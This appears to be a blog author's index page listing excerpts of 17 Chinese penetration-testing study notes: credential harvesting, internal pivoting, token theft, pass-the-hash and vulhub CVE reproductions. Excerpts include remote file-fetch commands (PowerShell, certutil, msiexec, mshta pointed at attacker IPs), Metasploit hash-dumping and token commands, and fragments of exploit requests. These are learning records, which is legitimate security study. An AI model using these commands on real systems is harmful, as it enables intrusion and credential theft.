自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 收藏
  • 关注

原创 凭据获取学习记录

常见凭据获取常见运维工具凭据获取xshell连接记录保存在xshell的安装目录下session目录中以后缀为xsh文件。工具下载地址:https://github.com/HyperSine/how-does-Xmanager-encrypt-passwordSecureCRTgithub下载链接:https://github.com/gitPoc32/Forensic/tree/master/VanDykeSecureCRT运行命令:python VanDyke_SecureCRT_de

2022-02-03 20:40:13 2289

原创 内网渗透-跳板搭建

查看socks模块搭建socks5代理use auxiliary/server/socksset SRVHOST 192.168.106.10set SRVPORT 3080run设置带有账号、密码认证的socks5代理连接代理kali连接代理首先修改/etc/proxychains.conf文件proxychains namp ……windows使用proxifier连接...

2021-02-12 00:10:49 1345 1

原创 内网渗透-windows令牌窃取

令牌(token)访问令牌(Access Token):表示访问控制操作主体的系统对象会话令牌(Session Token):是交互会话中唯一的身份标识符。密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾msf伪造令牌use incognito #进入incognito模块list_tokens -u #列出令牌Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程

2021-02-10 15:46:09 327

原创 内网渗透-hash传递

passingthehash 获取hash值run post/windows/gather/smart_hashdump检查权限和系统类型检查是否是域控服务器从注册表读取hash,注入lsass进程如果是08server并具有管理员权限直接getsystem如果是windows且uac关闭具有管理员权限,直接读取03/xp直接getsystem 从注册表获取hash获取到meterpreter,先进程迁移再提权,然后hashdumphash传递exploit/windows/smb/p

2021-02-09 16:07:21 439

原创 内网-文件上传与下载

powershell(new-object Net.WebClient).DownloadFile('http://192.168.174.130/ip.txt','C:\ip.txt')certutilCertutil –urlcache –split –f http://192.168.174.130:8000/ip.txtmsiexecMsiexec /q /i http://192.168.3.1/test.txtmshtaMshta http://192.168.174.

2021-02-07 20:26:30 669

原创 内网渗透之信息收集(更新中)

基本信息net命令家族wmi命令家族spn服务名其他(route,query)安全防护进程杀软进程名单## msf信息收集模块auxitiary系列post系列获取目标机器的分区情况run post/windows/gather/arp_scannerDevice Name: Type: Size (bytes):\\.\A: 4702111234474983745\\.\D

2021-02-06 23:41:15 321 1

原创 vulhub-nginx

CVE-2013-4547影响范围Nginx 0.8.41~1.4.3Nginx 1.5.0~1.5.7CVE-2017-7529越界读取缓存漏洞影响范围Nginx version 0.5.6 - 1.13.2

2021-01-23 20:43:38 88

原创 weblogic权限绕过CVE-2020-14482&远程命令执行漏洞CVE-2020-14883

漏洞危害CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。影响版本Weblogic : 10.3.6.0.0Weblogic : 12.1.3.0.0Weblogic : 12.2.1.3.0Weblogic : 12.2.1.4.0

2021-01-02 23:56:28 883

原创 Apereo CAS 4.1 反序列化

漏洞背景Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。漏洞复现环境启动后,访问页面如图所示:漏洞原理是Webflow中使用了默认密钥changeit:下载地址:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-

2021-01-02 00:22:17 405

原创 InfluxDB API 未授权访问漏洞

InfluxDB是一个使用Go语言编写的开源分布式,支持高并发的时序数据库,其使用JWT作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,JWT的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。影响版本InfluxDB < 1.7.6 的版本。漏洞复现标识:8086端口 HTTP API 的 X-Influxdb-Version 标志头...

2020-12-31 01:21:58 1295

原创 Apache Unomi远程命令执行漏洞-CVE-2020-13942

漏洞详情:Apache Unomi是一个Java开源客户数据平台,是用来管理客户和访问者的数据,并个性化客户体验。由于Apache Unomi允许远程攻击者使用包含任意类的MVEL和OGNL表达式发送恶意请求,最终可导致攻击者使用Unomi应用程序权限远程执行代码。影响版本Apache Unomi < 1.5.2漏洞复现访问页面如图所示:构造如下请求包数据包内容POST /context.json HTTP/1.1Host: 192.168.174.158:9443Accept

2020-12-31 00:45:53 163

原创 XXL-JOB executor未授权访问漏洞

漏洞详情XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的Restful API接口或RPC接口没有配置认证措施,未授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。漏洞利用条件XXL-JOB <= 2.2.0漏洞利用过程访问xxl-job的客户端提交如下数据包返回200说明已经成功执行payload内容POST /run HTTP/1.1Host: your-ip:9999Accept-Encoding: gzip, deflateAcce

2020-12-30 23:44:44 447

原创 ActiveMQ反序列化漏洞-CVE-2015-5254

漏洞前言:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码漏洞复现docker-compose up -d #启动环境环境运行后,将监听61616和8161两个端

2020-12-30 23:00:42 103

原创 Fastjson1.2.47简单利用

Fastjson1.2.47版本反序列化漏洞漏洞简介fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不

2020-12-30 21:39:28 482

原创 AppWeb认证绕过漏洞-CVE-2018-8715

漏洞背景:Appweb是一个嵌入式HTTP Web服务器,主要的设计思路是安全。这是直接集成到客户的应用和设备,便于开发和部署基于Web的应用程序和设备。它迅速( 每秒处理3500多要求)而紧凑 ,其中包括支持动态网页制作,服务器端嵌入式脚本过程中的CGI ,可加载模块的SSL ,摘要式身份验证,虚拟主机, Apache样式配置,日志记录,单和多线程应用程序。它提供了大量的文档和示例。漏洞原理其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递

2020-12-30 14:33:56 129

原创 shiro反序列化漏洞复现

漏洞描述Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。那么,Payload产生的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payl

2020-12-21 22:19:26 126

原创 渗透测试之信息收集

渗透之信息收集信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息、子域名信息、目标网站信息、目标网站真实IP、目录文件、开放端口和服务、中间件信息、脚本语言等等等当你拿到一个目标站,就是要去做的是如下:whois查询,子域名爆破,C段/旁站、Web指纹收集、端口扫描等等。whois 可获取如下信息子域名扫描OneForAll,Layer子域名扫描,Sublist3r(列举多资源下查到的域名)和subDomainsBrute。(递归查询多级域名)以及一些在线的网站比如:ht

2020-12-20 16:47:06 2470 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除